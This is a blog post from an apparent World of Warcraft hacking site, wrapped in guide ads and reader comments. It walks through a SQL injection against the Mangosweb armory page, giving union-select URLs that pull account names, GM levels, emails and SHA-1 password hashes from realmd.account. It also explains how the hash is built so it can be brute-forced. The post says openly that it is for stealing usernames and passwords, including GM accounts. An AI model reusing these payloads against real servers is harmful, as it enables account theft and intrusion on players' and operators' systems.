First - WoW Exploit Community 2012 recommendations!

  1. The BEST WOW Guides Available today. E.G: Leveling & Loremaster Guide,Vanity Pets & Mounts Guide, Dailies & Events Guide,Titles, Rep, & Macros Guide and more!) Try it FREE Now

  2. Great Video Guide: "How to Level Your World of Warcraft Character Solo From Level 1 to 90 The FASTEST Way Possible?"

  3. Sorry for not updating the site but We don't have time to this. We have decided to sell it. This site is for sale! first come first served- contact us: sales @ dtheatre.com


This is not an ingame exploit. It can be used to steal usernames and passwords, evem gm accounts. First of all the following guide is only for the servers that use Mangosweb to run their homepage. This is a very popular site and many private servers run Mangosweb.

The exploit is hidden within the armory. With a SQL injection we can extract passwords or other sensitive informations. Access the site. For example:
www.target.domain/index.php

Replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select 11,22,33,44–

If you will see 11 on the resulting page, the following will work. If you don’t see anything try changing char=1 to char=2 or any other number, until you find a character it doesn’t exist.

Now replace:
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select <field>,null,null,null from <database> where <condition>–

We will work with <database>=realmd.account

The <field> can be:

id – id of the account
username – name of the account
I – password of the account
gmlevel – 0,1,2 or 3 account level
email – the registration email
joindate – the date the account was made on
last_ip – the ip the user last time logged into the server
and others…

And the <condition> for example can look like this:
username=’admin’
gmlevel=3
id=5
gmlevel=2 and id<100
and other combinations.

So if you want to retrieve the password of the user john you will replace
index.php
with
index.php?n=armory&sub=viewchar&char=1 union select I,null,null,null from realmd.account where username=’john’–

If everything went well you should see a 40 character encrypted password like this:
7e27e687f56923bec2ff792cbe983d8ff5c5fc10

This is the hash of the password encrypted with SHA-1 (160 bits). So presuming john’s password was “test”. The encrypted password above resulted from JOHN:TEST . So you see, the encryted password also contains the username, separated from the password with “:”.

SHA1(CONCAT(UPPER(‘john’),’:’,UPPER(‘test’))) – this is the line that made this 7e27e687f56923bec2ff792cbe983d8ff5c5fc10. You can see the upper() function, that means that all passwords aren’t case sensitive, and are transformed into uppercase at the creation.

Because SHA-1 is one-way, you can’t reverse engineer it. You must brute-force it, using the prefix JOHN: . Also you must exclude lowercase characters while brute-forcing, use only 0-9,A-Z and perhaps special characters. Have fun. I will write a guide perhaps if you are interested… until then… try cracking it on you own.

3 Comments so far »

  1. by alex, on July 27 2009 @ 3:09 am

     

    ive looked everywhere and cannot find a wow private server using mangosweb please help

  2. by hdrroba, on July 27 2009 @ 8:17 pm

     

    Hi WoW Booty Bay.
    please help me, add hugomfold@hotmail.com i need urgently talk to you, please.

  3. by Levi, on November 23 2009 @ 8:20 pm

     

    I dont get it at all help me email me at Berogan2@yahoo.com

Comment RSS · TrackBack URI

Leave a comment

Name: (Required)

eMail: (Required)

Website:

Comment:

 

WoW Booty Bay

Remember, help yourself to our guides and help keep our emulation server up and running so we can continue to test the newest hacks and exploit the freshest loopholes!

Resources